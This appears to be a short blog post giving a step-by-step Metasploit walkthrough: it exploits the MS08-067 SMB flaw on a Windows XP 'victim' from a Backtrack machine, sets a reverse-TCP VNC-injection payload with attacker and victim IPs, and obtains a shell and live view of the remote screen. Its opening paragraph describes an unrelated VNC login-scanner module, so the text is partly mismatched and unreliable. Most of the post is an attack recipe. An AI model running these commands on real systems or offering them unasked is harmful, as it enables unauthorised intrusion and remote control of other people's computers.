This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, and 3.8 using the VNC challenge response authentication method.
Requirement :
Attacker system : Backtrack
Victim system : win xp
Follows the following steps :
Step 1: type msfconsole in the terminal
Step 2: search netapi exploit
step 3: use exploit/windows/smb/ms08_067_netapi
step 4: set payload windows/vncinject/reverse_tcp
step 5: set RHOST 192.168.56.103(Remote IP Address:It will be different for defferent System)
step 6: set LHOST 192.168.56.102 (Local IP Address: It will be your IP Address)
step 7: set LPORT 1234
Now we have to conform that all the options will be set which is Required=yes
step 8: Now exploit the system it connect to RFB server. It will provide us the shell and it will provide us direct screen of the remote system.
The Remote screen is displayed in our Backtrack Machine.
No comments:
Post a Comment